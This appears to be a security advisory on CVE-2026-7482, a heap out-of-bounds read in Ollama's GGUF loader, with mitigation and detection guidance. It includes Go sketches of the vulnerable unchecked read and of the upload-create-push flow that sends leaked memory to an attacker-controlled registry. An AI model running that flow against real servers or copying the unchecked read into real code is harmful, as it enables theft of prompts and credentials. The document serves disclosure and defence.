Bleeding Llama: CVE-2026-7482 and what Ollama’s GGUF loader hands an attacker
Ollama 0.17.1 shipped on May 1, 2026 and the patch notes do not exactly scream at you about what it fixes. The PR (GitHub #14406, commit 88d57d04) is a small change in the GGUF tensor path. The bug it closes — CVE-2026-7482, branded “Bleeding Llama” by Cyera — is a network-reachable, unauthenticated heap out-of-bounds read in the model creation flow that turns a self-hosted inference box into a leak source for other users’ prompts, the system prompts of other loaded models, and, depending on how the process was started, every environment variable in the process — which on real deployments means API keys for the upstream model providers, registry credentials, and whatever the cloud metadata service handed the host at boot. CVSS 9.1, network vector, no auth, no user interaction. If you run Ollama with OLLAMA_HOST=0.0.0.0 anywhere — and a lot of you do — this is the one to drop other work for.
The bug, in the smallest number of words
The loader in fs/ggml/gguf.go and the quantization path in server/quantization.go (the WriteTo() flow, specifically ConvertToF32) trust the tensor metadata in an uploaded GGUF file. The tensor shape dimensions are multiplied together to derive an element count, and the element count drives the read loop straight into the in-memory buffer. There is no check that the backing buffer actually contains that many bytes.
So if I declare a shape that implies a million F16 elements but ship you a 4 KB blob, the loop walks off the end of my allocation and into whatever lives next to it on the heap. Source dtype is F16, target is F32. That conversion is lossless. Adjacent heap memory survives byte-for-byte into the output tensor.
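To make that concrete, here is a minimal Go sketch of the pattern, with hypothetical names; this is not Ollama's code, and whether the overrun reads a neighbor silently or trips a bounds check depends on how the backing buffer is carved, which a sketch this small does not model.

```go
package sketch

import (
	"encoding/binary"
	"math"
)

// loadTensorF16 is a hypothetical sketch of the vulnerable pattern, not
// Ollama's code. The attacker-declared dims size the read; nothing relates
// that size to the bytes the uploaded blob actually contains.
func loadTensorF16(arena []byte, offset uint64, dims []uint64) []float32 {
	elements := uint64(1)
	for _, d := range dims {
		elements *= d // unchecked product from GGUF metadata; can also overflow
	}
	// Carve elements*2 bytes out of a shared buffer. If the blob only
	// supplied 4 KB, this window extends into whatever sits after it.
	raw := arena[offset : offset+elements*2]
	out := make([]float32, elements)
	for i := range out {
		// F16 -> F32 widening is lossless, so adjacent bytes survive
		// verbatim into the output tensor.
		out[i] = f16ToF32(binary.LittleEndian.Uint16(raw[2*i:]))
	}
	return out
}

// f16ToF32 widens an IEEE 754 half to a single (subnormals flushed to
// zero to keep the sketch short).
func f16ToF32(h uint16) float32 {
	sign := uint32(h>>15) << 31
	exp := uint32(h>>10) & 0x1f
	mant := uint32(h) & 0x3ff
	switch exp {
	case 0:
		return math.Float32frombits(sign)
	case 0x1f:
		return math.Float32frombits(sign | 0x7f800000 | mant<<13)
	default:
		return math.Float32frombits(sign | (exp+112)<<23 | mant<<13)
	}
}
```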
Then I call /api/push to a registry I control, and the leaked bytes ride out in the model artifact.
Three HTTP calls. /api/blobs to stage, /api/create with the malicious manifest, /api/push to ship. The name field on create is a URI pointing at the attacker registry — that’s the exfil channel built right into the protocol.
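For orientation, the flow as Go HTTP calls. This is a shape sketch, not a working PoC: no malicious GGUF is constructed, and the JSON field names are assumptions that vary across Ollama API versions.

```go
package sketch

import (
	"bytes"
	"fmt"
	"net/http"
)

// threeCalls sketches the stage/create/push sequence. Field names
// ("model", "files") are assumptions; the GGUF bytes are the caller's
// problem and deliberately not built here.
func threeCalls(target, attackerRegistry string, gguf []byte, digest string) error {
	// 1. /api/blobs: stage the crafted GGUF under its digest.
	blobURL := fmt.Sprintf("%s/api/blobs/sha256:%s", target, digest)
	if _, err := http.Post(blobURL, "application/octet-stream", bytes.NewReader(gguf)); err != nil {
		return err
	}
	// 2. /api/create: the model name is a URI at a registry the attacker
	// controls, which is the exfil channel built into the protocol.
	name := fmt.Sprintf("%s/leak/m:latest", attackerRegistry)
	create := fmt.Sprintf(`{"model":%q,"files":{"model.gguf":"sha256:%s"}}`, name, digest)
	if _, err := http.Post(target+"/api/create", "application/json", bytes.NewBufferString(create)); err != nil {
		return err
	}
	// 3. /api/push: the artifact, leaked heap bytes included, leaves the host.
	push := fmt.Sprintf(`{"model":%q}`, name)
	_, err := http.Post(target+"/api/push", "application/json", bytes.NewBufferString(push))
	return err
}
```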
Why this is worse than the average heap OOB read
Most OOB-read bugs in a process need an oracle — some channel that turns the leaked bytes into observable behavior. Here the oracle is the product. You ask Ollama to write a model file, it writes one. The leak is the file. There’s no timing side-channel to massage, no error-message regex to parse, no remote-allocator dance. The contents are non-deterministic (you get whatever the allocator happened to place adjacent), but the PoC from Cyera’s Dor Attias, who reported the bug, shows that on a busy server with concurrent users you reliably pull prompts and message bodies out of other sessions. Iterate a few times and you get system prompts for other loaded models. Iterate more and you get the process environment.
That last part is the one that should bother you most. OLLAMA_* env vars, sure, but also whatever the container runtime injected — AWS_*, GOOGLE_APPLICATION_CREDENTIALS paths, registry pull secrets that some helpful Helm chart pasted in as plaintext, the IMDSv2 token if somebody re-exported it for a sidecar. The blast radius depends entirely on how your platform team launches the process, and in practice that means it depends on whether anyone reviewed the unit file or the Deployment manifest after the original author left.
How exposed are you, actually
Ollama binds to 127.0.0.1 by default. The docs are clear about this. In production almost nobody runs it that way for long. Internal platform teams flip OLLAMA_HOST=0.0.0.0 because the inference box has to serve a fleet of notebooks. Researchers port-forward the GPU workstation to their laptop and forget to undo it. The “AI sidecar” pattern — Ollama on an EC2 instance with a public IP and a security group somebody opened for “testing” — is depressingly common. Public scans at disclosure time were finding roughly 300,000 reachable Ollama endpoints on the internet, and in the first weeks after the fix the majority were still pre-0.17.1.
So: assume internet-reachable until proven otherwise, and assume that proof is harder than ss -tlnp on one host.
What to do this week
Upgrade to 0.17.1. That is the only durable fix and it is not negotiable: the missing input validation on attacker-controlled tensor metadata is the whole bug, and you cannot mitigate around it cleanly.
If you cannot patch immediately (image rebuild pipeline is slow, some downstream pinning, the usual), the stopgaps in rough order of effectiveness:
- Revert the bind. Set OLLAMA_HOST=127.0.0.1 and put an authenticated reverse proxy in front. nginx with mTLS or a short OIDC sidecar is fine; the point is that /api/create should never be reachable without an identity attached. (AC-3, SC-7.) A minimal Go sketch of this front door follows the list.
- Block /api/push at the proxy if you do not actually publish models from this host. Kills the primary exfil path. The attacker can still leak via a creative manifest, but you have removed the easy mode.
- Egress controls on the GPU host. Allowlist the registries you actually push to. Outbound HTTPS from a GPU inference node to arbitrary hosts is not a normal pattern and should not be one. (AC-4, SC-7.)
- Segment. The GPU box should not sit on the same L2 as your secrets manager or your build agents. I have seen exactly this layout on shared internal AI clusters and it makes a 9.1 worse.
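If you take the proxy route, the front door does not need to be elaborate. A minimal sketch in Go, with a static bearer token standing in for the mTLS or OIDC the first bullet actually recommends; the token name and listener details are placeholders, not a production design.

```go
// Minimal authenticated front door for a loopback-bound Ollama. A sketch:
// the static bearer token stands in for mTLS/OIDC, and /api/push is
// dropped outright because this host never publishes models.
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
	"strings"
)

func main() {
	upstream, err := url.Parse("http://127.0.0.1:11434") // OLLAMA_HOST back on loopback
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(upstream)

	token := os.Getenv("FRONTDOOR_TOKEN") // hypothetical name; fail closed if unset
	if token == "" {
		log.Fatal("FRONTDOOR_TOKEN not set")
	}

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		got := strings.TrimPrefix(r.Header.Get("Authorization"), "Bearer ")
		if subtle.ConstantTimeCompare([]byte(got), []byte(token)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return // no identity, no /api/create, no anything
		}
		if strings.HasPrefix(r.URL.Path, "/api/push") {
			http.Error(w, "forbidden", http.StatusForbidden)
			return // kill the primary exfil path at the door
		}
		proxy.ServeHTTP(w, r)
	})
	log.Fatal(http.ListenAndServe(":8443", nil)) // terminate TLS in front of this in practice
}
```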
Detections that survive contact with real traffic
A few things worth wiring up. None of these are clean — expect tuning.
The strongest signal is a /api/create request whose declared tensor-shape product, multiplied by the element size, exceeds the size of the blob it references. That’s the bug condition expressed as a log query. You need the request body captured and parsed, which in practice means terminating TLS at a proxy that logs it; the Ollama process itself does not emit this. In Splunk you can carve it from an HTTP access sourcetype if you wrote a props.conf that pulls the JSON body, which most people did not. The Elastic equivalent is messier because the ingest pipeline for arbitrary JSON bodies tends to choke on tensor shape arrays of mixed depth.
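Expressed as code instead of a query, the condition is small. A sketch of the predicate for a blob-store audit job, assuming you already have something that recovers tensor dims and element sizes from the staged GGUF header:

```go
package sketch

import "math"

// suspiciousTensor is the bug condition as a standalone predicate. dims
// and elemSize come from whatever GGUF header parser you already run
// (assumed here); blobBytes is the staged blob's actual size on disk.
func suspiciousTensor(dims []uint64, elemSize, blobBytes uint64) bool {
	need := elemSize
	for _, d := range dims {
		if d != 0 && need > math.MaxUint64/d {
			return true // shape product overflows uint64: suspicious on its face
		}
		need *= d
	}
	return need > blobBytes // declares more bytes than were actually uploaded
}
```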
A cheaper proxy signal: /api/create followed within the same session by /api/push to a host not on your registry allowlist. Low volume on a normal inference box, near-zero false positives once you carve out your own CI pushes. (AU-2, AU-6.)
A dumb but useful one: model names submitted to /api/create that contain an http:// or https:// scheme prefix. Legitimate model names rarely do. Expect a handful of false positives from people pasting Hugging Face URLs into the wrong field; that is fine, those are conversations worth having anyway.
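As code, roughly this, assuming a proxy-side hook that hands you the submitted name:

```go
package sketch

import "strings"

// schemePrefixedName flags model names carrying a URL scheme. The field
// this runs against ("model" or "name" on /api/create) varies by version.
func schemePrefixedName(model string) bool {
	m := strings.ToLower(model)
	return strings.Contains(m, "http://") || strings.Contains(m, "https://")
}
```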
Finally, outbound traffic from the GPU subnet to registries that are not on the allowlist. This is where you actually see exfiltration if the earlier signals missed it — and you should treat the GPU egress allowlist as load-bearing detection, not just policy.
One caveat worth being honest about: prompts and system messages leaking through model artifacts will not look like a normal data-loss pattern to a DLP product. You are not exfiltrating a CSV. You are exfiltrating a binary tensor blob whose interior happens to contain ASCII fragments. Most DLP rules will miss it.
Control mapping
| Control | Where it bites |
|---|---|
| SI-2 | Patch to 0.17.1. The fix exists; apply it. |
| SI-10 | Root cause — the loader trusts attacker-supplied tensor metadata to size a buffer read. |
| AC-3 / AC-4 | /api/create has no auth; /api/push is an information-flow path out of the trust boundary. |
| SC-7 | 0.0.0.0 binding without an authenticated front door is the exposure shape. |
| SC-8 | Heap contents leaving the host inside a model artifact is the confidentiality break. |
| AU-2 / AU-6 | Detection requires request bodies you may not currently log. |
| SA-15 | Self-hosted AI runtimes are a supply-chain element; treat them like one. |
Do not stretch the mapping further than that. Bleeding Llama is fundamentally a memory-safety bug at the parser boundary, dressed up in an AI-shaped wrapper. Treat it as one.
The wider point
GGUF parsers are going to keep producing bugs like this. The format is permissive, the metadata is structural, and a lot of the runtimes — Ollama, llama.cpp, the various downstream forks — share lineage in the parsing code. If you accept user-supplied GGUF on a network endpoint, you have signed up for an attack surface that looks a lot more like a media codec from 2008 than like a model server. Plan for the next one.
Upgrade. Close the egress. Log the bodies you need to detect this class.